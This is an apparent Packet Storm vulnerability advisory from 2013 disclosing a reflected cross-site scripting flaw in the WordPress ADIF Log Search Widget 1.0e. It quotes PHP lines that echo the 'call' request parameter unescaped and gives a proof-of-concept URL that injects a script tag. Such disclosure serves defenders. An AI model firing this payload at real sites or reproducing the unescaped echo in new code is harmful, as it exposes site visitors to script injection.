ADIF Log Search Widget 1.0e Cross Site Scripting

2013-05-27T00:00:00
ID PACKETSTORM:121777
Type packetstorm
Reporter Keith Makan
Modified 2013-05-27T00:00:00

Description

                                        
                                            `# Exploit Title: ADIF Log Search Widget XSS Arbitrary Vulnerability  
# Google Dork:  
# Date: 26/05/13  
# Exploit Author: k3170makan  
# Vendor Homepage: http://wordpress.org/plugins/adif-log-search-widget/  
# Software Link: http://wordpress.org/plugins/adif-log-search-widget/  
# Version: 1.0e  
# Tested on: Ubuntu 12.04.2 LTS  
Wordpress ADIF log book search plugin widget suffers from a Cross Site  
Scripting vulnerability.  
  
Code: logbook_search.php  
-------------------------------------------------------------------------------------------------------------------  
55 echo "  
56 <div id=\"logbook_poplight\" class=\"logbook_poplight\"  
title=\"$num_rows QSO's with ".$_REQUEST['call']."\">";  
57 echo "<table>";  
58 echo " <tr>";  
  
  
Code: logbook_search.php  
-------------------------------------------------------------------------------------------------------------------  
93 else{  
94 echo "  
95  
96 <div id=\"logbook_poplight\" class=\"logbook_poplight\"  
title=\"No QSO's with ".$_REQUEST['call']."\">  
97 Sorry, nothing found in the logbook!  
98 </div>  
99 ";  
100 logbook_search_form();  
101 }  
102 }  
  
The above code fails to sanitize the "$_REQUEST['call']" value passed to  
the script from the Widgets HTML form, allowing attackers to inject  
HTML/JavaScript into a victims browser session.  
  
  
PoC:  
http://[domain]/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E<http://127.0.0.1/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E>  
  
  
--   
<k3170makan  
blog="http://blog.k3170makan.com"  
src ="https://github.com/k3170makan"  
tweets="https://twitter.com/k3170makan"  
/>  
`